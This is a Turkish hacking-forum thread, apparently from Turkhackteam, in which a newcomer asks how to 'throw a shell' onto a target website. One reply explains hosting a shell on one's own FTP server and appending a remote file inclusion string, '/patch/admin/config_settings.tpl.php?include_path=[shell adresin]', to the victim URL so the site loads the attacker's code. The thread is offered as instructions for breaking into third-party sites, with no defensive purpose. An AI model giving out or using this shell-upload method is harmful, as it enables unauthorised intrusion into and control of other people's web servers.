shell li siteyi hacklemek tamamda shell nasıl atılıyor?

mikrop_2

Yeni üye
14 Nis 2007
13
0
mrb arkadaşalr genelde hep google kodu ve shell li sitelerin hackleme yolu var sitede mesela hedef bi xxx sitemiz var buna nasıl shell atarız..?
 

mali311

Katılımcı Üye
26 Ara 2008
740
0
İlk Olarak Kendine Ftp Adresi Alıyosun Sonra Aldığın ßu Adrese Shelli Atıyosun Site Sonuna
" /patch/admin/config_settings.tpl.php?include_path=[shell adresin] "
ßu Kodu €kliyosun Gelen Yerdede Nereye Gitmek İstiyorsan Oraya Gidiyosun Özet Olãrak ßöle Diyebilirim
Ve Konuyu Yanlış Yere Açmışsın Dikkat Edelim Lütfen
 

mikrop_2

Yeni üye
14 Nis 2007
13
0
kusura bakmayın forumda yeniyim mod uygun yere taşır sanırım.... bilgi için teşekkürler... daha ayrıntılılarını bekliyorum öreneğin kendimize ftp nasıl açıyoruz.. (sadece bu başlıktan herşeyi öğrenmek gibi bi niyetim yok bende araştırıyorum sürekli.... mutlaka birisi cıkıp biraz arştır herşeyi hazır bekleme diyeceği için baştan yazıyım dedim.. )
 

mali311

Katılımcı Üye
26 Ara 2008
740
0
ßencede İyi Düşünmüşsün İnşallah Öğrenirsin Forumu Dikkatli Okursan Aslında Kolay Mantığını Anlaman Yeter Sadece
 

mikrop_2

Yeni üye
14 Nis 2007
13
0
mali311 özel ms atmışsın ama 40 msj olmadığı için msj gönderemiyorum msn adresini özelden gönderebilirmisin aslında çok sevmem forumu böyle kirletmeyi ama biraz mecburiyet şubattan başka zamanım yok anlayışınız için teşekkür ederim
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.